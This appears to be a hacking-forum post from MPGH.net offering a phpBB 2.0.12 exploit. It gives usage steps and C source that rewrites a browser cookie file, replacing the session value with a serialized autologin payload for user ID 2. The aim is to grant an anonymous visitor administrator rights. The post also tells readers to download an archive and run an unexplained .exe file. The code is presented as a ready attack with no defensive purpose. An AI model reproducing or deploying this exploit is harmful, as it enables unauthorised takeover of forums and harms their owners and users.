/*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^ *^*^*^*\
This is an exploit for phpBB 2.0.12 and under.
Its very simple to use but some forums have been patched.
First download the 897.rar file:
Place 879.exe in your firefox folder.
Usually:
C:\DocumentsandSettings\ApplicationData\Mozilla\Fi refox\Profiles\something.default
Visit a site that is using phpBB 2.0.12 or under, close the browser!
Double click the .exe file.
Than, browse the Forums again.
This gives anonymous users administrator rights only.
If something goes wrong clear cookies and try again.
Source Code:
Code:
//Released on MPGH.net
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
//Taken from VeNoMouS's love cow code
char *search_and_replace (char *text, char *find, char *replace)
{
char *found,*new_text;
int
len_find=strlen(find),len_replace=strlen(replace),len_text=strlen(text),i=0,j=0;
if((new_text=(char*)malloc(len_text+len_replace-len_find+1))==NULL)
{
printf("malloc issue...\n");
return new_text;
}
found = strstr(text, find);
while (i <= len_text)
{
if ( found != text + i )
{
new_text[j] = text[i];
i++;
j++;
}
else
{
strcat (new_text, replace);
i += len_find;
j += len_replace;
found = strstr (text + i, find);
}
new_text[j] = '\0';
}
return new_text;
}
int main()
{
FILE * pFile;
long lSize;
char * buffer;
pFile = fopen ( "cookies.txt" , "r" );
if (pFile==NULL) exit (1);
fseek (pFile , 0 , SEEK_END);
lSize = ftell (pFile);
rewind (pFile);
buffer = (char*) malloc (lSize);
if (buffer == NULL) exit (2);
fread (buffer,1,lSize,pFile);
fclose (pFile);
pFile = fopen ( "cookies.txt" , "w" );
fputs(search_and_replace((char *)buffer,"a%3A0%3A%7B%7D","a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D"), pFile);
fclose (pFile);
free (buffer);
return 0;
}
//Released on MPGH.net
Brought To You By MPGH.net
\*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^*^* ^*^*^*^*/